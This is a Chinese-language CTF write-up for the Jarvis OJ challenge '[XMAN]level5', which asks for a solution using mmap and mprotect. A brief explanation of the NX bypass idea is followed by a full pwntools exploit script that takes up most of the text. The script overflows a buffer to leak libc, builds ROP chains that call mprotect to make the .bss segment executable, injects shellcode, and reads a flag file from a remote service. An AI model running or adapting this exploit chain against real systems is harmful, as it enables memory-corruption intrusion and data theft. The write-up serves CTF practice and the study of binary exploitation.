[XMAN]level5
mmap和mprotect练习,假设system和execve函数被禁用,请尝试使用mmap和mprotect完成本题。
nc pwn2.jarvisoj.com 9884
附件同level3_x64
mmap可以将文件或其他对象映射到内存中,mprotect可以改变某段地址的权限(rwx)
程序开启了NX保护,因此可以考虑用mprotect将一段bss段或data段设置成rwx权限然后写入shellcode并执行
exp如下:
from pwn import * #io = process('./level3_x64') io = remote('pwn2.jarvisoj.com', 9884) elf = ELF('./level3_x64') #libc = elf.libc libc = ELF('./libc-2.19.so') context.arch = 'amd64' context.os = 'linux' #context.log_level = 'debug' pop_rdi = 0x4006b3 pop_rsi_r15 = 0x4006b1 write_plt = 0x4004B0 write_got = 0x600A58 read_plt = 0x4004C0 vuln_addr = 0x4005E6 payload = b'a' * 136 + p64(pop_rdi) + p64(1) + p64(pop_rsi_r15) + p64(write_got) payload += p64(0) + p64(write_plt) + p64(vuln_addr) io.recvuntil('Input:\n') io.send(payload) write_addr = u64(io.recv(8)) info("write_addr:" + str(hex(write_addr))) libc_base = write_addr - libc.symbols['write'] info("libc_base:" + str(hex(libc_base))) pop_rsi = 0x24885 + libc_base info("pop_rsi:" + str(hex(pop_rsi))) pop_rdx = 0x286 + libc_base info("pop_rdx:" + str(hex(pop_rdx))) mprotect_addr = libc_base + libc.symbols['mprotect'] info("mprotect_addr:" + str(hex(mprotect_addr))) payload = b'a' * 136 + p64(pop_rdi) + p64(0x600000) + p64(pop_rsi) + p64(0x1000) payload += p64(pop_rdx) + p64(7) + p64(mprotect_addr) + p64(vuln_addr) io.recvuntil('Input:\n') io.send(payload) shellcode = shellcraft.open('./flag') shellcode += shellcraft.read(3, 0x600500, 0x100) shellcode += shellcraft.write(1, 0x600500, 0x100) shellcode = asm(shellcode) payload = b'a' * 136 + p64(pop_rdi) + p64(0) + p64(pop_rsi) + p64(0x600000) payload += p64(pop_rdx) + p64(len(shellcode)) + p64(read_plt) + p64(0x600000) io.recvuntil('Input:\n') io.send(payload) sleep(0.5) io.send(shellcode) io.interactive()